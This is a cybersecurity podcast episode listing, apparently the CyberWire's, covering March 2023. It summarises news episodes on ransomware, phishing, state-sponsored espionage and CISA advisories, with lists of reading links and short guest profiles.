IcedID is evolving away from its banking malware roots. An Emotet phishing campaign spoofs IRS W9s. The FBI warns of BEC scams. A Fake booter service as a law enforcement honeypot. Phishing in China's nuclear energy sector. Reports of an OpenAI and a ChatGPT data leak. Does Iran receive Russian support in cyberattacks against Albania? My conversation with Linda Gray Martin and Britta Glade from RSAC with a preview of this year's conference. Our own Rick Howard takes a field trip to the National Cryptologic Museum. And De-anonymizing Telegram.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/58

Selected reading.

Fork in the Ice: The New Era of IcedID (Proofpoint)

Emotet malware distributed as fake W-9 tax forms from the IRS (BleepingComputer)

Internet Crime Complaint Center (IC3) | Business Email Compromise Tactics Used to Facilitate the Acquisition of Commodities and Defrauding Vendors (IC3)

Phishing Campaign Targets Chinese Nuclear Energy Industry (Intezer)

'Bitter' espionage hackers target Chinese nuclear energy orgs (BleepingComputer)

UK Sets Up Fake DDoS-for-Hire Sites to Trap Hackers (PCMag Middle East)

UK National Crime Agency reveals it ran fake DDoS-for-hire sites to collect users’ data (Record)

OpenAI: ChatGPT payment data leak caused by open-source bug (BleepingComputer)

OpenAI says a bug leaked sensitive ChatGPT user data (Engadget)

March 20 ChatGPT outage: Here’s what happened (OpenAI)

How Albania Became a Target for Cyberattacks (Foreign Policy)

Russia’s Rostec allegedly can de-anonymize Telegram users (BleepingComputer)

An introduction to the National Cryptologic Museum. [Special Edition] Mar 27, 2023

Rick Howard, N2K’s CSO and The CyberWire’s Chief Analyst and Senior Fellow, sits down with Director of the National Cryptologic Museum, Dr. Vince Houghton. The National Cryptologic Museum is the NSA's affiliated museum sharing the nation's best cryptologic secrets with the public. In this special episode, Rick interviews Dr. Houghton from within the walls of the National Cryptologic Museum, discussing the new and improved museum along with the new exhibits they uncovered during the pandemic.

Two viewpoints on the National Cybersecurity Strategy. [Special Edition] Mar 26, 2023

Earlier this month, the White House released the National Cybersecurity Strategy, the first issued since 2018. The strategy refocuses roles, responsibilities, and resource allocations in the digital ecosystem, with a five pillar approach. Those pillars are: defending critical infrastructure, disrupting threat actors, shaping market forces to drive security and resilience, investing in a resilient future, and forging international partnerships.

We wanted to delve into the strategy and its intended effects further, so Dave Bittner spoke with representatives from industry and inside government. Dave first speaks with Adam Isles, Principal and Head of Cybersecurity Practice at The Chertoff Group, sharing industry's take on the strategy. Following that conversation, Dave had a discussion with Steve Kelly, Special Assistant to the President and Senior Director for Cybersecurity and Emerging Technology at the National Security Council, for a look at the strategy from inside the White House.

Links to resources:

Point of View: 2023 National Cybersecurity Strategy The Chertoff Group's blog
National Cybersecurity Strategy 2023

Tanya Janca: Find a community who supports you. [CEO] [Career Notes] Mar 26, 2023

Tanya Janca, CEO and Founder of We Hack Purple, sits down to talk about her exciting path into the field of cybersecurity. Trying several different paths in high school, she soon found she was good at computer science. When it came to picking a college, she knew that was the field she wanted to get into. After college, she was able to use her skills to work at a couple of different organizations, eventually getting into the Canadian government. While there, she held the position of CISO for the Canadian election in 2015 when Justin Trudeau was elected, but she knew she wanted to try something new. She switched from programming to security and after working at Microsoft as a presenter, she eventually found that she wanted to start her own company, saying "at first it was just me presenting, but now we have community members present to each other and it's just been really beautiful to see that grow." She hopes that with her and her community's help, nobody is left feeling unsafe when it comes to being online.

Popunders are not the good kind of ads. [Research Saturday] Mar 25, 2023

On this episode, Jérôme Segura, senior threat researcher at Malwarebytes, shares his team's work, "WordPress sites backdoored with ad fraud plugin." WordPress is an immensely popular content management system (CMS) powering over 43% of all websites. Many webmasters will monetize their sites by running ads and need to draw particular attention to search engine optimization (SEO) techniques to maximize their revenues.

The Malwarebytes team discovered a few dozen WordPress blogs using the same plugin that mimics human activity by automatically scrolling a page and following links within it, all the while a number of ads were being loaded and refreshed. The blogs would only exhibit this invalid traffic behavior when launched from a specific URL created by this plugin, otherwise they appeared completely legitimate.

The research can be found here:

WordPress sites backdoored with ad fraud plugin

Tools, alerts, and advisories from CISA. Reply phishing scams. Cl0p goes everywhere with GoAnywhere. EW in the hybrid war, and shields stay up. Mar 24, 2023

A CISA tool helps secure Microsoft clouds.JCDC and pre-ransomware notification. CISA releases six ICS advisories. Reply phishing. Cl0p goes everywhere exploiting GoAnywhere. Russian electronic warfare units show the ability to locate Starlink terminals. Betsy Carmelite from Booz Allen Hamilton on the DoD's zero trust journey. Analysis of the National Cybersecurity strategy from our special guests, Adam Isles, Principal at the Chertoff Group and Steve Kelly, Special Assistant to the President and Senior Director for Cybersecurity and Emerging Technology with the National Security Council.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/57

Selected reading.

JCDC Cultivates Pre-Ransomware Notification Capability (Cybersecurity and Infrastructure Security Agency CISA)

US cyber officials make urgent push to warn businesses about vulnerabilities to hackers (CNN)

Untitled Goose Tool Aids Hunt and Incident Response in Azure, Azure Active Directory, and Microsoft 365 Environments | CISA (Cybersecurity and Infrastructure Security Agency CISA)

New CISA tool detects hacking activity in Microsoft cloud services (BleepingComputer)

CISA Releases Six Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency CISA)

The Microsoft Reply Attack (Avanan)

More victims emerge from Fortra GoAnywhere zero-day attacks (Security |

More Clop GoAnywhere attack victims emerge (SC Media)

Mass-Ransomware Attack on GoAnywhere File Transfer Tool Exposes Companies Worldwide (Medium)

City of Toronto confirms data theft, Clop claims responsibility (BleepingComputer)

Canadian movie chain Cineplex among the victims of GoAnywhere MFT hack (Financial Post)

Personal data of Rio Tinto's Aussie staff may have been hacked - memo (Reuters)

Another GoAnywhere Attack Affects Japanese Giant Hitachi Energy (Heimdal Security Blog)

Using Starlink Paints a Target on Ukrainian Troops (Defense One)

As CISA chief notes lack of Russian cyberattacks against US, experts focus on enhancing nuclear reactor security (Utility Dive)

Using Deception to Learn About Russian Threat Actors (Security Boulevard)

Pyongyang’s intelligence services have been busy in cyberspace. Hacktivists exaggerate the effects of their attacks on OT. Ghostwriter is back. A twice-told tale: ineffective cyberwar campaigns. Mar 23, 2023

DPRK threat actor Kimsuky uses a Chrome extension to exfiltrate emails, while ScarCruft prospects South Korean organizations. Hacktivists' claims of attacks on OT networks may be overstated. Ghostwriter remains active in social engineering attempts to target Ukrainian refugees. Joe Carrigan has cyber crime by the numbers. Our guest is Christian Sorensen from SightGain with analysis of the cyber effects of Russia’s war.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/56

Selected reading.

North Korean hackers using Chrome extensions to steal Gmail emails (BleepingComputer)

Joint Cyber Security Advisory (Korean) (BundesamtfuerVerfassungsschutz)

North Korean APT group ‘Kimsuky’ targeting experts with new spearphishing campaign (Record)

ScarCruft's Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques (The Hacker News)

The Unintentional Leak: A glimpse into the attack vectors of APT37 (Zscaler)

CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) (ASEC BLOG)

A Propaganda Group is Using Fake Emails to Target Ukrainian Refugees (Bloomberg)

We (Did!) Start the Fire: Hacktivists Increasingly Claim Targeting of OT Systems | Mandiant (Mandiant)

Fact or fiction, hacktivists' claims of industrial sabotage in Russia or Ukraine get attention online (CyberScoop)

The 5×5—Conflict in Ukraine's information environment (Atlantic Council)

How the Russia-Ukraine conflict has impacted cyber-warfare (teiss)

CommonMagic APT gang attacking organisations in Ukraine (Tech Monitor)

Detecting sandbox emulations. VEC supply chain attacks. Updates from the hybrid war. CISA and NSA offer IAM guidance. Other CISA advisories. Baphomet gets cold feet after all. Mar 22, 2023

Malware could detect sandbox emulations. A VEC supply chain attack. A new APT is active in Russian-occupied sections of Ukraine. An alleged Russian patriot claims responsibility for the D.C. Health Link attack. CISA and NSA offer guidance on identity and access management (IAM). Tim Starks from the Washington Post has analysis on the BreachForums takedown. Our guest is Ryan Heidorn from C3 Integrated Solutions with a look at the CMMC compliance timeline. And Baphomet backs out.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/55

Selected reading.

ZenGo uncovers security vulnerabilities in popular Web3 Transaction Simulation solutions: The red pill attack (ZenGo)

Stopping a $36 Million Vendor Fraud Attack (Abnormal Intelligence)

Bad magic: new APT found in the area of Russo-Ukrainian conflict (Securelist)

Unknown actors target orgs in Russia-occupied Ukraine (Register)

New 'Bad Magic' Cyber Threat Disrupt Ukraine's Key Sectors Amid War (The Hacker News)

Partisan suspects turn on the cyber-magic in Ukraine (Cybernews)

Hacker tied to D.C. Health Link breach says attack 'born out of Russian patriotism' (CyberScoop)

CISA and NSA Release Enduring Security Framework Guidance on Identity and Access Management | CISA (Cybersecurity and Infrastructure Security Agency CISA)

ESF Partners, NSA, and CISA Release Identity and Access Management Recommended Best Practi (National Security Agency/Central Security Service)

Identity and Access Management: Recommended Best Practices for Administrators (NSA and CISA)

CISA Releases Updated Cybersecurity Performance Goals (Cybersecurity and Infrastructure Security Agency CISA)

CISA Releases Eight Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)

End of BreachForums could take a bite out of cybercrime (Washington Post)

BreachForums says it is closing after suspected law enforcement access to backend (Record)

Threat group with novel malware operates in SE Asia. Data theft extortion rises. Key findings of Cisco's Cybersecurity Readiness Index. iPhones no longer welcome in Kremlin. Russian cyber auxiliaries & privateers devote increased attention to healthcare. Mar 21, 2023

Threat group with novel malware operates in Southeast Asia. Data theft extortion on the rise. Key findings of Cisco's Cybersecurity Readiness Index. iPhones are no longer welcome in the Kremlin. Russian cyber auxiliaries and privateers devote increased attention to the healthcare sector. Chris Eng from Veracode shares findings of their Annual Report on the State of Application Security. Johannes Ullrich from SANS Institute discusses scams after the failure of Silicon Valley Bank. And BreachForums seems to be under new management.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/54

Selected reading.

NAPLISTENER: more bad dreams from developers of SIESTAGRAPH (Elastic Blog)

Unit 42 Ransomware and Extortion Report Highlights: Multi-Extortion Tactics Continue to Rise (Palo Alto Network)

Ransomware and extortion trends. (CyberWire)

Cisco Cybersecurity Readiness Index (Cisco)

A look at resilience: companies' ability to fight off cyberattacks. (CyberWire)

Putin to staffers: throw out your iPhones over security (Register)

Black Basta, Killnet, LockBit groups targeting healthcare in force (SC Media)

After BreachForums arrest, new site administrator says the platform will live on (Record)

Cl0p ransomware at Hitachi Energy. Alleged TikTok surveillance of journalists. Hacktivist auxiliary hits Indian healthcare records. Cyberattack on Latitude: update. BreachForums arrest. Mar 20, 2023

Cl0p ransomware hits Hitachi Energy. The US Department of Justice investigates ByteDance in alleged surveillance of journalists. A Hacktivist auxiliary hits Indian healthcare records. Pirated software is used to carry malware. The Effects of cyberattack on Latitude persist. Adam Meyers from CrowdStrike shares findings from the 2023 CrowdStrike Global Threat Report. Rick Howard has the latest preview of CSO Perspectives. And Pompompurin is arrested for an alleged role in BreachForums.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/53

Selected reading.

Hitachi Energy confirms data breach after Clop GoAnywhere attacks (BleepingComputer)

Hitachi Energy Group hit by cyber-attack, says network operations not compromised (cnbctv18.com)

Justice Department Probes TikTok’s Tracking of U.S. Journalists (Wall Street Journal)

The FBI And DOJ Are Investigating ByteDance’s Use Of TikTok To Spy On Journalists (Forbes)

KillNet and affiliate hacktivist groups targeting healthcare with DDoS attacks (Azure Network Security Team)

Pro-Russia hackers are increasingly targeting hospitals, researchers warns (Record)

Russian hacktivist group targets India’s health ministry (CSO Online)

Russian Hacktivist group Phoenix targets India’s Health Ministry Website (Threat Intelligence | CloudSEK)

Ukraine warns that hacked software can be infected with Russian viruses (Kyiv Independent)

Russian hackers spread infected software through torrents (SSSCIP)

Australia's Latitude takes systems offline, Federal Police investigate cyberattack (Reuters)

FBI targets notorious cybercrime market with teen’s arrest (Washington Post)

Dark Web ‘BreachForums’ Operator Charged With Computer Crime (Bloomberg)

Feds arrest alleged BreachForums owner linked to FBI hacks (The Verge)

NY Man Charged as 'Pompompurin,' the Boss of BreachForums (KrebsOnSecurity)

Breach Forums Admin 'Pompompurin' Arrested in New York (Cyber Kendra)

Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York (The Hacker News)

Kathleen Smith: Translating the cyber world. [CMO] [Career Notes] Mar 19, 2023

Kathleen Smith, CMO from ClearedJobs.Net, sits down to share her story as she remembers having big shoes to fill in her childhood. She strived for greatness at an early age, as her parents told her she would be going to college and would follow strong guidelines to become successful. Kathleen can remember being into the hard sciences when she was in school, which sparked an interest in becoming a biochemist and law student. Eventually she found her passion as a translator, saying that "doing the translator role, I wanted to get into international marketing and I was going on to get my degree on that." She found her way to ClearedJobs.Net and fell in love with it. She had sought to find a workplace that wouldn't burn her out, where she can also be a part of the team. Kathleen found what she was passionate about and made it a reality for herself, and now she just wants young women starting in the field to know the importance of finding something they are passionate about. We thank Kathleen for sharing her story.

CISA Alert AA23-075A – #StopRansomware: LockBit 3.0. Mar 18, 2023

CISA, FBI, and the Multi-State Information Sharing and Analysis Center are releasing this joint advisory to share known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.

AA23-075A Alert, Technical Details, and Mitigations

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

ChatGPT grants malicious wishes? [Research Saturday] Mar 18, 2023

Bar Block, Threat Intelligence Researcher at Deep Instinct, joins Dave to discuss their work on "ChatGPT and Malware - Making Your Malicious Wishes Come True." Deep Instinct goes into depth on just how dangerous ChatGPT can be in the wrong hands as well as how artificial intelligence is better at creating malware than providing ways to detect it.

Researchers go on to explain how the AI app can be used in the wrong hands saying "Examples of malicious content created by the AI tool, such as phishing messages, information stealers, and encryption software, have all been shared online."

The research can be found here:

ChatGPT and Malware: Making Your Malicious Wishes Come True

Some movement in the cyber underworld. Vishing impersonates the US Social Security Administration. More SVB-themed phishing. And compromise without user interaction. Mar 17, 2023

BianLian gang’s pivot. HinataBot is a Go-based threat. The US Social Security Administration is impersonated in attempted vishing attacks. BlackSnake in the RaaS criminal market. More Silicon Valley Bank-themed phishing. Caleb Barlow from Cylete on security implications you need to consider now about Chat GPT. Our guest is Isaac Roth from LeakSignal with advice on securing the microservices application layer. And Russian operators exploit an Outlook vulnerability.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/52

Selected reading.

BianLian Ransomware Gang Continues to Evolve ([redacted])

Uncovering HinataBot: A Deep Dive into a Go-Based Threat (Akamai)

Social InSecurity: Armorblox Stops Attack Impersonating Social Security Administration (Armorblox)

Netskope Threat Coverage: BlackSnake Ransomware (Netskope)

Fresh Phish: Silicon Valley Bank Phishing Scams in High Gear (INKY)

Outlook zero day linked to critical infrastructure attacks (Cybersecurity Dive)

CVE-2023-23397: Exploitations in the Wild – What You Need to Know (Deep Instinct)

Everything We Know About CVE-2023-23397 (Huntress)

Microsoft Mitigates Outlook Elevation of Privilege Vulnerability (Microsoft Security Response Center)

CISA warns of Telerik vulnerability exploitation. Cloud storage re-up attacks. Phishing tackle so convincing it will deceive the many. Cyber developments in Russia's hybrid war. Mar 16, 2023

Telerik exploited, for carding (probably) and other purposes. Cloud storage re-up attacks. Cybercriminals use new measures to avoid detection of phishing campaigns. "Winter Vivern" seems aligned with Russian objectives. Microsoft warns of a possible surge in Russian cyber operations. Boss Sandworm. Johannes Ullrich from SANS talking about malware spread through Google Ads. Our guest is David Anteliz from Skybox Security with thoughts on federal government cybersecurity directives. And don't fear the Reaper.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/51

Selected reading.

Threat Actors Exploited Progress Telerik Vulnerability in U.S. Government IIS Server (Cybersecurity and Infrastructure Security Agency CISA)

Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server | CISA (Cybersecurity and Infrastructure Security Agency CISA)

CISA: Federal civilian agency hacked by nation-state and criminal hacking groups (CyberScoop)

US govt web server attacked by 'multiple' criminal gangs (Register)

The Cloud Storage Re-Up Attack (Avanan)

Threat Spotlight: 3 novel phishing tactics (Barracuda)

Winter Vivern | Uncovering a Wave of Global Espionage (SentinelOne)

Is Russia regrouping for renewed cyberwar? (Microsoft On the Issues)

A year of Russian hybrid warfare in Ukraine (Microsoft Threat Intelligence)

Russian hackers preparing new cyber assault against Ukraine - Microsoft report (Reuters)

Microsoft Warns Russia May Plan More Ransomware Attacks Beyond Ukraine (Bloomberg)

This Is the New Leader of Russia's Infamous Sandworm Hacking Unit (WIRED)

What's known and not about US drone-Russian jet encounter (AP NEWS)

Russia tries to retrieve downed US drone in Black Sea (The Telegraph)

Downed U.S. drone points to cyber vulnerabilities (Washington Post)

CISA Alert AA23-074A – Threat actors exploit progress telerik vulnerability in U.S. government IIS server. [CISA Cybersecurity Alerts] Mar 16, 2023

CISA, FBI, and the Multi-State Information Sharing and Analysis Center are releasing this joint Cybersecurity Advisory to provide IT infrastructure defenders with TTPs, IOCs, and methods to detect and protect against recent exploitation against Microsoft Internet Information Services web servers.

AA23-074A Alert, Technical Details, and Mitigations

AA23-074A STIX XML

MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server

Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)

ACSC Advisory 2020-004

Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI

Volexity Threat Research: XE Group

GitHub: Proof-of-Concept Exploit for CVE-2019-18935

Microsoft: Configure Logging in IIS

GitHub: CVE-2019-18935

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Patch Tuesday notes. SVB's and the cybersecurity sector. SVR's APT29 is phishing for access to information. Trends in the Russo-Ukraine cyberwar. LockBit counts coup (says LockBit). Mar 15, 2023

Patch Tuesday notes. Silicon Valley Bank's collapse and its effects on the cybersecurity sector. SVR's APT29 used a Polish state visit to the US as phishbait. Regularizing hacktivist auxiliaries. Our guest is Crane Hassold from Abnormal Security with a look at threats to email. Grayson Milbourne from OpenText Cybersecurity addresses chaos within the supply chain. And LockBit claims to have compromised an aerospace supply chain.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/50

Selected reading.

March 2023 Patch Tuesday: Updates and Analysis (CrowdStrike)

Microsoft Releases March 2023 Security Updates (Cybersecurity and Infrastructure Security Agency CISA)

Adobe Releases Security Updates for Multiple Products (Cybersecurity and Infrastructure Security Agency CISA)

Mozilla Releases Security Updates for Firefox 111 and Firefox ESR 102.9 (Cybersecurity and Infrastructure Security Agency CISA)

SAP Security Patch Day for March 2023 (Onapsis)

March Patch Tuesday review. (CyberWire)

What the collapse of Silicon Valley Bank means for cyber and the tech startup ecosystem. (CyberWire)

NOBELIUM Uses Poland's Ambassador’s Visit to the U.S. to Target EU Governments Assisting Ukraine (BlackBerry)

Ukraine Tracks Increased Russian Focus on Cyberespionage (Bank Info Security)

Ukraine scrambles to draft cyber law, legalizing its volunteer hacker army (Newsweek)

Ransomware Group Claims Theft of Valuable SpaceX Data From Contractor (SecurityWeek)

Silicon Valley Bank as phishbait. An “attack superhighway.” Unauthorized software in the workplace. YoroTrooper, a new cyberespionage threat actor. Hacktivists game, too. How crime pays. Mar 14, 2023

Expect phishing, BEC scams, and other social engineering to use Silicon Valley Bank lures. An "attack superhighway." Unauthorized software in the workplace. A new cyberespionage group emerges. Squad up (but not IRL). Ben Yelin unpacks the FBI director’s recent admission of purchasing location data. Ann Johnson from Afternoon Cyber Tea speaks with Jason Barnett from HCA Healthcare about cyber resilience. And, not that you’d consider a life of crime, but what are the gangs paying cyber criminals, nowadays?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/49

Selected reading.

SVB's collapse and the potential for fraud. (CyberWire)

State-of-the-Internet: malicious DNS traffic. (CyberWire)

Unauthorized software in the workplace. (CyberWire)

Talos uncovers espionage campaigns targeting CIS countries, including embassies and EU health care agency (Cisco Talos Blog)

STALKER 2 game developer hacked by Russian hacktivists, data stolen (BleepingComputer)

GSC Game World suffers Stalker 2 leak after latest cyber attack (GamesIndustry.biz)

Threat Groups Offer $240k Salary to Tech Jobseekers (Security Intelligence)

Coping with Silicon Valley Bank's collapse. BatLoader's abuse of Google Search Ads. More on Emotet’s re-emergence. Medusa rising. NetWire collared. More-or-less quiet on the cyber front. Mar 13, 2023

Coping with Silicon Valley Bank's collapse. BatLoader's abusing Google Search Ads. More on Emotet’s re-emergence. Reflections on Medusa rising. An international law enforcement action against NetWire. Rob Shapland from Falanx Cyber on ethical hacking and red teaming. Bryan Ware from LookingGlass looks at exploited vulnerabilities in the US financial sector. And in Ukraine, it’s more-or-less quiet on the cyber front (but in Estonia and Georgia, not so much).

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/48

Selected reading.

One of Silicon Valley's top banks fails; assets are seized (AP NEWS)

US, UK try to stem fallout from Silicon Valley Bank collapse (AP NEWS)

In abrupt reversal, regulators to cover Silicon Valley Bank, Signature uninsured deposits (American Banker)

Silicon Valley Bank collapse will not trigger new financial crisis, insists Sunak (The Telegraph)

‘Banking system is safe’: Joe Biden reassures markets in address on Silicon Valley Bank collapse – live updates (the Guardian)

BatLoader Continues to Abuse Google Search Ads to Deliver Vidar Stealer and Ursnif (eSentire)

BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads (The Hacker News)

Emotet Again! The First Malspam Wave of 2023 (Deep Instinct)

Emotet attempts to sell access after infiltrating high-value networks (SC Media)

Medusa ransomware gang picks up steam as it targets companies worldwide (BleepingComputer)

Alleged seller of NetWire RAT arrested in Croatia (Help Net Security)

FBI and international cops catch a NetWire RAT (Register)

How the FBI proved a remote admin tool was actually malware (TechCrunch)

Estonia’s Election Was More Than Just a Win for Kallas (World Politics Review)

Estonian official says parliamentary elections were targeted by cyberattacks (Record)

Bat El Azerad: Find your niche to bring to the table. [CEO] [Career Notes] Mar 12, 2023

Bat El Azerad, CEO and Co-founder of mobile phishing protection company novoShield, shares her personal account of her experience as a female leader in the cybersecurity field as well as some insights into how far the industry has come and where it is headed in terms of the gender gap. Bat El speaks about how she grew into her role of becoming a CEO, by sharing where she started and how she got involved with novoShield. She share's that being a woman in this industry can be tough and so she shares some advice, saying "so you have to be very focused and to find the right niche to bring something to the table because the competition in this industry and the level of innovation, um, is, is great." Bat El hopes that throughout her time in the industry she hopes people remember her for her vision, and the mission she is helping to create and maintain at her company. We thank Bat El for sharing her story.

Files stolen from a sneaky SymStealer. [Research Saturday] Mar 11, 2023

Ron Masas of Imperva discusses their work, the "Google Chrome “SymStealer” Vulnerability. How to Protect Your Files from Being Stolen." By reviewing the ways the browser handles file systems, specifically searching for common vulnerabilities relating to how browsers process symlinks, the Imperva Red Team discovered that when files are dropped onto a file input, it’s handled differently.

Dubbing it as CVE-2022-40764, researchers found a vulnerability that "allowed for the theft of sensitive files, such as crypto wallets and cloud provider credentials." In result, over 2.5 billion users of Google Chrome and Chromium-based browsers were affected.

The research can be found here:

Google Chrome “SymStealer” Vulnerability: How to Protect Your Files from Being Stolen

Cybercrime and cyberespionage: IceFire, DUCKTAIL, LIGHTSHOW, Remcsos, and a tarot card reader. US cyber budgets, strategy, and a DoD cyber workforce approach. Five new ICS advisories. Mar 10, 2023

New IceFire version is out. A DUCKTAIL tale. Social engineering by Tehran. DPRK's LIGHTSHOW cyberespionage. The President's Budget and cybersecurity. The US Department of Defense issues its cyber workforce strategy. Remcos surfaces in attacks against Ukrainian government agencies. DDoS at a Ukrainian radio station. Dave Bittner sits down with Beth Robinson of Bishop Fox to share their 2023 Offensive Security Resolutions. Caleb Barlow from Cylete on the security implications of gigapixel images. And CISA releases five ICS advisories.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/47

Selected reading.

IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks (SentinelOne)

DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell, and Other Custom Tactics to Avoid Detection (Deep Instinct)

Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers (CyberScoop)

Iranian APT Targets Female Activists With Mahsa Amini Protest Lures (Dark Reading).

Iran threat group going after female activists, analyst warns (Cybernews)

Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970 (Mandiant)

Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW (Mandiant)

Cybersecurity in the US President's Budget for Fiscal Year 2024. (CyberWire)

Biden’s budget proposal underscores cybersecurity priorities (Washington Post)

Biden Budget Proposal: $200M for TMF, CISA With 4.9% Budget Boost (Meritalk)

Cybersecurity Poised for Spending Boost in Biden Budget (Gov Info Security)

Deputy Secretary of Defense Signs 2023-2027 DoD Cyber Workforce Strategy (U.S. Department of Defense)

In new cyber workforce strategy, DoD hopes 'bold' retention initiatives keep talent coming back (Breaking Defense)

Remcos Trojan Returns to Most Wanted Malware List After Ukraine Attacks (Infosecurity Magazine)

February 2023’s Most Wanted Malware: Remcos Trojan Linked to Cyberespionage Operations Against Ukrainian Government (Check Point Software)

Radio Halychyna cyber-attacked following appeal by Russian hacker group (International Press Institute)

CISA Releases Five Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)

PlugX is now wormable. Compromised webcams found. Emotet is back. AI builds a keylogger. Cyber in the hybrid war. BEC comes to productivity suites. Mar 09, 2023

A wormable version of the PlugX USB malware is found. Compromised webcams as a security threat. Emotet botnet out of hibernation. Proof-of-concept: AI used to generate polymorphic keylogger. Turning to alternatives as conventional tactics fail. Dave Bittner speaks with Eve Maler of ForgeRock to discuss how digital identity can help create a more secure connected car experience. Johannes Ullrich from SANS on configuring a proper time server infrastructure. And Phishing messages via legitimate Google notifications.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/46

Selected reading.

A border-hopping PlugX USB worm takes its act on the road (Sophos News)

BitSight identifies thousands of global organizations using insecure webcams and other IoT devices, finding many susceptible to eavesdropping (BitSight)

Emotet malware attacks return after three-month break (BleepingComputer)

BlackMamba: Using AI to Generate Polymorphic Malware (HYAS)

Russian Cyberwar in Ukraine Stumbles Just Like Conventional One (Bloomberg)

Australian official demands Russia bring criminal hackers ‘to heel’ (The Record by Recorded Future)

Russia will have to rely on nukes, cyberattacks, and China since its military is being thrashed in Ukraine, US intel director says (Business Insider)

BEC 3.0 - Legitimate Sites for Illegitimate Purposes (Avanan)

Data breaches and IP. Current cyberespionage campaigns. A warning that the cyber phases of the hybrid war can’t be expected to be over, yet. Exfiltration via machine learning inference. Mar 08, 2023

CISA adds three known exploited vulnerabilities to its Catalog. A data breach at Acer exposes intellectual property. Sharp Panda deploys SoulSearcher malware in cyberespionage campaigns. US Cyber Command’s head warns against underestimating Russia in cyberspace. Dave Bittner sits down with Simone Petrella of N2K Networks to discuss the recently-released Defense Cyber Workforce Framework. Betsy Carmelite from Booz Allen Hamilton speaks about CISA's year ahead. And are large language models what the lawyers call an attractive nuisance.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/45

Selected reading.

CISA Adds Three Known Exploited Vulnerabilities to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

March 7 CISA KEV Breakdown | Zoho, Teclib, Apache (Nucleus Security)

Acer Confirms Breach After Hacker Offers to Sell Stolen Data (SecurityWeek)

Acer confirms breach after 160GB of data for sale on hacking forum (BleepingComputer)

“Sharp Panda”: Check Point Research puts a spotlight on Chinese origined espionage attacks against southeast asian government entities (Check Point Software)

Pandas with a Soul: Chinese Espionage Attacks Against Southeast Asian Government Entities (Check Point Research)

What can security teams learn from a year of cyber warfare? (Computer Weekly)

Russian cyberattacks could intensify during spring offensives in Ukraine, US Cyber Command general says (Stars and Stripes)

US Bracing for Bolder, More Brazen Russian Cyberattacks (VOA)

Russia remains a ‘very capable’ cyber adversary, Nakasone says (C4ISRNet)

Employees Are Feeding Sensitive Business Data to ChatGPT (Dark Reading)

A new threat to routers. DoppelPaymer hoods collared. Ransomware hits a Barcelona hospital. Phishing in productivity suites. Espionage, hacktiism, and prank phone calls. Mar 07, 2023

